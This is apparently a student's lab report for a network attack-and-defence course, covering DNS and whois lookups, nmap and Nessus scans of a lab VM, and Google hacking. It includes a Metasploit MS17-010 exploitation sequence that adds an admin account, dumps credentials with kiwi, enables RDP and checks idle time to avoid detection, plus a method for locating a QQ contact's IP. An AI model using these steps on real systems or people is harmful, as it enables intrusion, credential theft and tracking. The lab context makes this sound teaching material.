20212421 2021-2022-2 《网络与系统攻防技术》实验五实验报告

本文详细记录了一次实验过程,包括从DNS查询获取信息、追踪IP地址、使用nmap和Nessus进行靶机环境扫描,以及网上足迹搜索。实验中探讨了如何获取地理位置、识别安全漏洞并提出解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

20212421 2021-2022-2 《网络与系统攻防技术》实验五实验报告

一、实验内容

(一)从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息:

DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置

PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息

(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置

(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

靶机IP地址是否活跃
靶机开放了哪些TCP和UDP端口
靶机安装了什么操作系统,版本是多少
靶机上安装了哪些服务

(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

靶机上开放了哪些端口
靶机各个端口上网络服务存在哪些安全漏洞
你认为如何攻陷靶机环境,以获得系统访问权

(五)网上足迹搜索

①通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题
②并练习使用Google hack搜集技能完成搜索

二、实验过程

(一)从besti.edu.cn中选择一个DNS域名进行查询,获取如下信息

1.DNS注册人及联系方式

使用whois命令进行相关用户的账户和域名信息查询:
在这里插入图片描述发现连接失败了,可能是防火墙的原因。尝试一下其他网址的相关信息查询,如bilibili.com:
在这里插入图片描述成功查询到了DNS的注册人(Alibaba cloud Computing(Beijing)co.,Ltd.)和联系方式(Email:DomainAbuse@service.aliyun.com;phone:+86.95187)。
但用whois命令查询besti.edu.cn的DNS注册人及联系方式失败了。

2.该域名对应IP地址

1:使用搜索引擎
在这里插入图片描述
2:使用IP查询平台(IP查询或者IP地址查询
在这里插入图片描述
在这里插入图片描述

3:nslookup
在这里插入图片描述发现无法找到besti.edu.cn,但其他的网址是可查询的,可能前者设置了防火墙,或者进行了查询限制。
4:dig
在这里插入图片描述这个也失败了。
两种方式都失败后,无奈直接用了besti.edu.cn的IP地址(202.205.232.1),用host命令反过来查询该网址主机名:
在这里插入图片描述发现前面还有ns. 的部分。于是使用ns.besti.edu.cn 进行查询:
在这里插入图片描述
在这里插入图片描述
成功查到其IP地址。

5:ping 命令
在这里插入图片描述

3.IP地址注册人及联系方式

使用whois 命令加上IP地址查询IP地址的注册人和联系方式:

在这里插入图片描述
在这里插入图片描述并没有找到相应的注册人,可能是被隐藏了。

4.IP地址所在国家、城市和具体地理位置

1:通过前面的IP查询平台,输入IP地址:
在这里插入图片描述
在这里插入图片描述
其位于中国北京。

2:使用whois+IP

在这里插入图片描述也能的大概知道位于中国北京。

3:使用埃文科技查询(有3次免费次数):
(1)IP查询:
在这里插入图片描述
(2)域名查询:
在这里插入图片描述
(3)traceroute 追踪路由路径
在这里插入图片描述
在这里插入图片描述发现无法看到中间经过的路由信息,可能是icmp包出现异常,使用wireshark进行抓包:
主机上的wireshark:
在这里插入图片描述虚拟机上的wireshark:
在这里插入图片描述发现虚拟机上icmp包有几次是超时,接下来全是udp包,而主机上抓到的有icmp的回应包,猜测可能是NAT转换的问题,导致回应的icmp包没有传到虚拟机,所以虚拟机traceroute结果是*。

(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置

在电脑上登陆QQ号,在手机上登录QQ小号:
(1)资源监视器
打开任务管理器,点击“性能”,在页面找到资源监视器,点击进去,找到“网络”页面,观察“网络活动"一栏:
在这里插入图片描述用电脑QQ给小号打电话,接通后就能观察到网络活动的变化:
在这里插入图片描述发现有两个是发送的,对其进行IP查询(前面有查询工具):
在这里插入图片描述
在这里插入图片描述
发现后一个地址是有点精确的。而前一个地址则在河北石家庄的腾讯云处。
(2)wireshark抓包
打开wireshark,开始抓包,用电脑QQ进行通信,用udp进行筛选:
在这里插入图片描述

查询该IP地址:
在这里插入图片描述

发现地址结果差不多。

对比了一下手机的IP地址,发现以上地址与手机的IP地址皆不同。可能这是一种保护机制吧,通过转换IP地址进行隐藏。

(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

1.靶机IP地址是否活跃

查询靶机的IP地址:
在这里插入图片描述

根据IP地址和子网掩码,可计算得该网段为: 192.168.223.0/24
在kali虚拟机输入:

nmap -sP 192.168.223.0/24

结果:
在这里插入图片描述
靶机和虚拟机的IP都处于活跃状态。

2.靶机开放了哪些TCP和UDP端口

输入:

nmap -sU 192.168.223.131
nmap -sT 192.168.223.131

结果:
在这里插入图片描述
在这里插入图片描述

可以看出检测出9个开放的tcp端口,6个udp端口。

3.靶机安装了什么操作系统,版本是多少

输入:

nmap -O 192.168.223.131

结果:
在这里插入图片描述

发现检测结果为:Microsoft Windows 7|2008|8.1

4.靶机上安装了哪些服务

输入:

nmap -sV -Pn 192.168.223.131

结果:
在这里插入图片描述
可以看到开启的服务有:msrpc,netbios-ssn,microsoft-ds。

(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

0.下载Nessus

下载这部分比较难,和有次实验下载veil差不多,比较繁琐。
Nessus下载链接:https://www.tenable.com/downloads/nessus?loginAttempted=true
在这里插入图片描述选择合适的版本。下载好后将.deb文件传到kali虚拟机里。
输入:

dpkg -i Nessus-10.7.2-ubuntu1404_amd64.deb

在这里插入图片描述
在这里插入图片描述根据倒数第二行提示,输入:

 /bin/systemctl start nessusd.service //启动nessus
 netstat -ntpl|grep nessus//查看服务是否开启

在这里插入图片描述
打开Firefox,输入最后一行提供的网址,进入网页:

进入网页后,点击advenced,向下滑动,点击accept,然后选择第一个版本,或者Nessus Expert:
在这里插入图片描述点击continue,这时需要license,输入:

/opt/nessus/sbin/nessuscli fetch --challenge//获取challenge

在这里插入图片描述

或者点击上方offline registration,也可以获取到challenge。
在这里插入图片描述获取activation code:https://zh-cn.tenable.com/products/nessus/nessus-essentials?tns_redirect=true
输入姓名邮箱,在邮箱获取到activation code:
在这里插入图片描述在这里插入图片描述输入challenge和activation code:
在这里插入图片描述下载all-2.0.tar.gz(Nessus plugins)和license:
在这里插入图片描述
在这里插入图片描述下载好后,打开license,将内容粘贴到之前的需要license的框里,然后创建用户:
在这里插入图片描述shell中,在文件下载的路径下输入,将文件复制到/opt/nessus路径下:

cp all-2.0.tar.gz /opt/nessus
cp nessus.license /opt/nessus

重启Nessus:

service nessusd restart

等待一段时间,安装好plugins(plugin rules会发亮):

在这里插入图片描述

1.靶机上开放了哪些端口

点击new scan,选择:
在这里插入图片描述点击三角形运行:
在这里插入图片描述结果为:
在这里插入图片描述靶机为192.168.223.131 ,存在一个critical漏洞,一个high漏洞,3个medium漏洞。点击进入该靶机页面:

在这里插入图片描述点击Nessus SYN scanner(port scanner)查看开放的端口:
在这里插入图片描述有三个开放的tcp端口。但udp端口却没有看到。点击其余的也没有看见udp端口的开放情况。
我新创建一个scan,选择的时host discovery,运行结果为:

在这里插入图片描述发现多了几个,不过都是1024以后的。

2.靶机各个端口上网络服务存在哪些安全漏洞

在第一个创建的scan中,点击靶机查看漏洞:
(1)0/icmp
在这里插入图片描述

ICMP Timestamp Request Remote Date Disclosure(ICMP时间戳请求远程日期披露)指的是一种网络安全问题,其中攻击者利用ICMP(Internet Control Message Protocol,互联网控制消息协议)的时间戳请求功能,向目标主机发送请求,以获取其当前时间戳。
这种请求本身可能并不构成直接的安全威胁,但如果被恶意利用,攻击者可以通过观察响应的时间戳等信息,获取目标主机的敏感信息,如系统运行时间、操作系统版本等。更进一步,攻击者还可能利用此漏洞,通过发送大量的恶意请求,占用目标主机的系统资源,导致拒绝服务攻击(DoS攻击)。

(2)445端口:
在这里插入图片描述

SMB签名是一种安全机制,用于验证SMB通信中的数据完整性和来源。当签名被禁用时,攻击者可能更容易执行中间人攻击,拦截并篡改通信内容,从而可能导致数据泄露、未经授权的访问或其他安全问题。

(3)49157端口:
在这里插入图片描述

MS16-047是一个针对安全帐户管理器(SAM)和本地安全机构(LSAD)远程协议的安全更新。该更新是为了解决Windows系统中存在的一个特定漏洞,这个漏洞可能允许攻击者通过中间人(MiTM)攻击提升特权。
具体来说,当攻击者成功利用这个漏洞时,他们可以强制降低SAM和LSAD通道的身份验证级别,并模拟经过身份验证的用户。这样,攻击者就可能获得对SAM数据库的访问权限,从而进一步实施恶意行为。

(4)445端口:
在这里插入图片描述

MS17-010是针对Microsoft Windows SMB(Server Message Block)服务器的一个关键安全更新。SMB是一种网络文件共享协议,广泛应用于Windows操作系统中,用于在计算机之间共享文件和打印机等资源。
MS17-010安全更新主要解决了SMBv1(Server Message Block version 1)协议中的一个严重漏洞。这个漏洞允许远程攻击者通过发送特制的SMB消息来执行任意代码,进而完全控制受影响的系统。攻击者可以利用这个漏洞进行各种恶意活动,如窃取敏感信息、破坏系统数据或执行其他恶意程序。

(5)N/A:
在这里插入图片描述

该风险指远程的Windows操作系统版本不再受到官方支持或更新。当操作系统不再受到支持时,可能面临以下问题和风险:
1.安全风险:由于没有官方的安全更新和补丁,操作系统将容易受到已知漏洞和新发现的威胁的攻击。这可能导致恶意软件感染、数据泄露或其他安全事件。
2.功能限制:不支持的操作系统可能无法运行最新的软件或硬件,因为它们可能需要更新版本的操作系统来提供必要的兼容性和功能。
3.技术支持有限:从官方渠道获取技术支持可能变得困难或不可能,因为制造商通常只为其当前支持的操作系统版本提供技术帮助。
4.兼容性问题:与网络中的其他设备或系统的兼容性可能出现问题,因为它们可能依赖于更新的操作系统功能或协议。
5.法规遵从性:在某些行业或地区,使用不受支持的操作系统可能违反法规或标准,特别是在处理敏感数据或执行关键任务时

3.你认为如何攻陷靶机环境,以获得系统访问权

根据前面的风险结果,可是使用MS16-047来提升权限,或者利用MS17-010漏洞来攻陷靶机,获取访问权限。
输入:

msfconsole
search ms17-010

在这里插入图片描述
输入:

use 3
set LHOST 192.168.223.128//kaliIP地址
set LPORT 2421
set RHOST 192.168.223.131//靶机IP地址
exploit

在这里插入图片描述可以看出,我们已经获取到了靶机的shell。
输入:

meterpreter > shell
net user 20212421 123456 /add
net localgroup administrators 20212421 /add

以及:
在这里插入图片描述太长了,就直接截了参考的图。

输入:

meterpreter > load kiwi //加载kiwi模块
Loading extension kiwi...Success.
creds_all  #列举所有凭据
exit   #退出

在这里插入图片描述
输入:

meterpreter > run post/windows/manage/enable_rdp  //启用目标主机的3389端口远程桌面
meterpreter > idletime  //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。

在这里插入图片描述输入:

rdesktop 192.168.223.131

再输入用户名和密码:
在这里插入图片描述在这里插入图片描述成功远程登陆。其余攻击可以见实验二 或者实验参考

(五)网上足迹搜索

1.通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题

在浏览器输入姓名搜索:
在这里插入图片描述看起来有很多的商人和我同名同姓。
输入学号搜索:
在这里插入图片描述可以看到我之前写的博客。

2.练习使用Google hack搜集技能完成搜索

在这里插入图片描述
在这里插入图片描述
(1)filetype
在这里插入图片描述(2)site
在这里插入图片描述
(3)经典用法
在这里插入图片描述

三、实验问题及解决方案

问题1:Nessus has no plugins在这里插入图片描述

解决方案:下载插件all-2.0.tar.gz,并重启Nessus进行更新。

问题2:Nessus 的license下载

解决方案:输入challenge和activation code,获取并下载插件和license。

四、实验感想

此次实验主要涉及使用工具进行信息搜集,搜集方面如端口、服务、漏洞等,根据漏洞进行攻击等。对于工具的依赖性较强,没有代码上的问题,命令行方面也还好。和实验二差不多的是在Nessus工具上,对于Nessus的下载也是废了很长的时间。可能时网络的问题,在下载.deb文件时,速度很慢,最后是找同学发了一份给我,然后就是插件的下载也很慢,加上更新的时间也用了好几个小时,所以感觉这个实验还是挺耗费时间的。当然最后的结果也都差不多解决了,也学到了很多新的内容。

五、实验参考

1.ubuntu安装Nessus限制版(2020-07)
2.Nessus安装与使用
3.【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
4.Kali–MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值